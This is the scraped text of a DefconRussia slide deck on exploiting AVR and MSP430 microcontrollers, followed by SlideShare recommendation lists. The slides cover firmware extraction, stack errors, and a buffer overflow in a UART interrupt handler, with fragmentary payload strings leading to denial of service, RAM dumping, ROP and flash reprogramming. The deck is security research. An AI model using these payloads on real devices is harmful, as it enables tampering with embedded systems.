SlideShare uma empresa Scribd logo

Vadim Bardakov - AVR & MSP exploitation

Transferir como PPTX, PDF
DefconRussia
DefconRussia
TecnologiaNotícias e política
1 de 34
AVR & MSP exploitation Vadim Bardakov Security Researcher Digital Security (ERPScan)
AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices © 2002—2013, Digital Security 2
AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices • Inc. amount of easily accessible data channels • Microcontroller firmware can be retrieved © 2002—2013, Digital Security 3
AVR & MSP exploitation Jokes © 2002—2013, Digital Security 4
AVR & MSP exploitation What if it works? © 2002—2013, Digital Security 5
AVR & MSP exploitation Oops… © 2002—2013, Digital Security 6
AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis © 2002—2013, Digital Security 7
AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis • Planarization • etc. © 2002—2013, Digital Security 8
AVR & MSP exploitation Firmware extraction MSP430: • FRAM • 5xx • 6xx © 2002—2013, Digital Security 9
AVR & MSP exploitation RAM MSP © 2002—2013, Digital Security AVR 10
AVR & MSP exploitation RAM General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 11
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 12
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers SP Additional I/O registers Internal RAM © 2002—2013, Digital Security ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 13
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security Additional I/O registers Internal RAM SP ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 14
AVR & MSP exploitation Stack errors General purpose registers SP Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security I/O Special Function Registers Additional I/O registers Internal RAM ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 15
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 16
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 17
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 18
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 19
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Seems OK I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Unknown offset Global Variables Internal RAM © 2002—2013, Digital Security 21
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Bypassing checks © 2002—2013, Digital Security Internal RAM 22
AVR & MSP exploitation Buffer overflow Access: • Local variables • Return address: • Compiler-generated instructions • Interruption • Bootloader © 2002—2013, Digital Security 23
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } Casual for UART handlers © 2002—2013, Digital Security 24
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xB . “x010xFC”xN Atmel Studio 6.1 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 25
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 26
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 DoS © 2002—2013, Digital Security 27
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } void uart_puts(const char *s ) { while (*s) uart_putc(*s++); print “xff”xB . “x010xFC”xN. P uart_puts(p); 000001C8 LDD R24,Y+1 000001CA LDD R25, Y+2 000001CB CALL 0x0000014E Load indirect with displacement Load immediate Call subroutine Dumping RAM } © 2002—2013, Digital Security 28
AVR & MSP exploitation Reprogramming © 2002—2013, Digital Security 29
AVR & MSP exploitation Reprogramming Open-source bootloaders sucks in production. © 2002—2013, Digital Security 30
AVR & MSP exploitation Reprogramming Load code to RAM print “xff”xB . “x000x16”xN. ROPTail Interruption handler Ideal for ROP © 2002—2013, Digital Security 31
AVR & MSP exploitation Reprogramming Gain control to SPM print Code . “x000xFC”xN. P Atmex +00000343: 95E8 …. +00000351: 95E8 SPM Store program memory SPM Store program memory Writing code to FLASH © 2002—2013, Digital Security 32
AVR & MSP exploitation Sum • Simple attacks can be conducted blindly • Different consequences: • DoS • Modifying device configuration • etc. © 2002—2013, Digital Security 33
Digital Security in Moscow: +7 (495) 223-07-86 Digital Security in Saint Petersburg: +7 (812) 703-15-47 www.dsec.ru www.erpscan.com v.bardakov@dsec.ru © 2002—2013, Digital Security 34

Recomendados

Safety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemSafety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemAleksandr Timorin
 
Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Yokogawa
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104pgmaynard
 
Yokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSYokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSAmit Sharma
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersAleksandr Timorin
 
Security testing in critical systems
Security testing in critical systemsSecurity testing in critical systems
Security testing in critical systemsPeter Wood
 
ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)家榮 張
 

Recomendados

Safety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemSafety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemAleksandr Timorin
 
Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Yokogawa
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104pgmaynard
 
Yokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSYokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSAmit Sharma
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersAleksandr Timorin
 
Security testing in critical systems
Security testing in critical systemsSecurity testing in critical systems
Security testing in critical systemsPeter Wood
 
ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)家榮 張
 
Improving SCADA Security
Improving SCADA SecurityImproving SCADA Security
Improving SCADA SecurityNarinrit Prem-apiwathanokul
 
FieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardFieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardYokogawa
 
Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Jorge_Rod
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheetqqlan
 
3 diagnostic
3 diagnostic3 diagnostic
3 diagnosticconfidencial
 
Axis Camera Companion
Axis Camera Companion Axis Camera Companion
Axis Camera Companion bethhaldane
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsAleksandr Timorin
 
Flexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreFlexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreChristian Pfaeffli
 
Audio Visual Control Systems
Audio Visual Control SystemsAudio Visual Control Systems
Audio Visual Control Systemssonn jita
 
Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013ifm electronic gmbh
 
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiDefcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiPriyanka Aash
 
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Technogroovy
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAleksandr Timorin
 
Protecting Your DNP3 Networks
Protecting Your DNP3 NetworksProtecting Your DNP3 Networks
Protecting Your DNP3 NetworksChris Sistrunk
 
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...InfinIT - Innovationsnetværket for it
 
Turnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CatalogueTurnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CataloguePERCo
 
G120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-usG120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-usSanjeewa Siriwardana
 
S4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsS4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsMarina Krotofil
 
SCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureSCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureqqlan
 
Yokogawa Centum VP
Yokogawa Centum VPYokogawa Centum VP
Yokogawa Centum VPAllan Moreira
 
Never Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCNever Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCAlexander Bolshev
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software peopleDobrica Pavlinušić
 

Mais conteúdo relacionado

Mais procurados

FieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardFieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardYokogawa
 
Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Jorge_Rod
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheetqqlan
 
Axis Camera Companion
Axis Camera Companion Axis Camera Companion
Axis Camera Companion bethhaldane
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsAleksandr Timorin
 
Flexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreFlexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreChristian Pfaeffli
 
Audio Visual Control Systems
Audio Visual Control SystemsAudio Visual Control Systems
Audio Visual Control Systemssonn jita
 
Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013ifm electronic gmbh
 
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiDefcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiPriyanka Aash
 
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Technogroovy
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAleksandr Timorin
 
Protecting Your DNP3 Networks
Protecting Your DNP3 NetworksProtecting Your DNP3 Networks
Protecting Your DNP3 NetworksChris Sistrunk
 
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...InfinIT - Innovationsnetværket for it
 
Turnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CatalogueTurnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CataloguePERCo
 
S4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsS4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsMarina Krotofil
 
SCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureSCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureqqlan
 

Mais procurados (20)

Improving SCADA Security
Improving SCADA SecurityImproving SCADA Security
Improving SCADA Security
 
FieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardFieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management Wizard
 
Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
 
3 diagnostic
3 diagnostic3 diagnostic
3 diagnostic
 
Axis Camera Companion
Axis Camera Companion Axis Camera Companion
Axis Camera Companion
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanisms
 
Flexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreFlexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see more
 
Audio Visual Control Systems
Audio Visual Control SystemsAudio Visual Control Systems
Audio Visual Control Systems
 
Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013
 
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiDefcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
 
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVE
 
Protecting Your DNP3 Networks
Protecting Your DNP3 NetworksProtecting Your DNP3 Networks
Protecting Your DNP3 Networks
 
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
 
Turnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CatalogueTurnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo Catalogue
 
G120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-usG120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-us
 
S4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsS4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsics
 
SCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureSCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architecture
 
Yokogawa Centum VP
Yokogawa Centum VPYokogawa Centum VP
Yokogawa Centum VP
 

Destaque

Never Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCNever Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCAlexander Bolshev
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software peopleDobrica Pavlinušić
 
Hardware Hacking
Hardware HackingHardware Hacking
Hardware Hackingrngtng
 
Return-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code InjectionReturn-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code Injectionguest9f4856
 
AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016Nick Timkovich
 
Hardware Hacking and Arduinos
Hardware Hacking and ArduinosHardware Hacking and Arduinos
Hardware Hacking and ArduinosHoward Mao
 
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd PerspectiveArduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd PerspectiveHoward Lewis Ship
 
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardwareXVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardwareMarcus Botacin
 
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱 Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱Hugh Choi 최형욱
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Luis Grangeia
 
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Minseok(Jacky) Cha
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Luis Grangeia
 
Calidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivasCalidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivasLIZZTOBON
 
Analyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of ThingsAnalyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of ThingsIke Clinton
 
사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!Hakyong Kim
 

Destaque (20)

Never Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCNever Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADC
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software people
 
Hardware Hacking
Hardware HackingHardware Hacking
Hardware Hacking
 
Return-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code InjectionReturn-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code Injection
 
AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
 
Hardware Hacking and Arduinos
Hardware Hacking and ArduinosHardware Hacking and Arduinos
Hardware Hacking and Arduinos
 
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd PerspectiveArduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
 
Hacking Techniques
Hacking TechniquesHacking Techniques
Hacking Techniques
 
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardwareXVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
 
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱 Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Arduino Anatomy
Arduino AnatomyArduino Anatomy
Arduino Anatomy
 
Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2
 
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
 
Calidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivasCalidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivas
 
Exploits & Mitigations - Memory Corruption Techniques
Exploits & Mitigations - Memory Corruption TechniquesExploits & Mitigations - Memory Corruption Techniques
Exploits & Mitigations - Memory Corruption Techniques
 
Analyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of ThingsAnalyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of Things
 
사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!
 

Semelhante a Vadim Bardakov - AVR & MSP exploitation

QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdfQRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdfmindhackers161
 
39245147 intro-es-i
39245147 intro-es-i39245147 intro-es-i
39245147 intro-es-iEmbeddedbvp
 
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...Embarcados
 
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...Honeywell
 
SIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنزSIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنزEssosElectronic
 
S emb t10-development
S emb t10-developmentS emb t10-development
S emb t10-developmentJoão Moreira
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?MITRE - ATT&CKcon
 
Efficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareEfficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareRiscure
 
Virtualization & Network Connectivity
Virtualization & Network Connectivity Virtualization & Network Connectivity
Virtualization & Network Connectivity itplant
 
Manual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21xManual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21xSANTIAGO PABLO ALBERTO
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON
 
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsDefcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsPriyanka Aash
 

Semelhante a Vadim Bardakov - AVR & MSP exploitation (20)

UNIT-III ES.ppt
UNIT-III ES.pptUNIT-III ES.ppt
UNIT-III ES.ppt
 
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdfQRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
 
39245147 intro-es-i
39245147 intro-es-i39245147 intro-es-i
39245147 intro-es-i
 
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
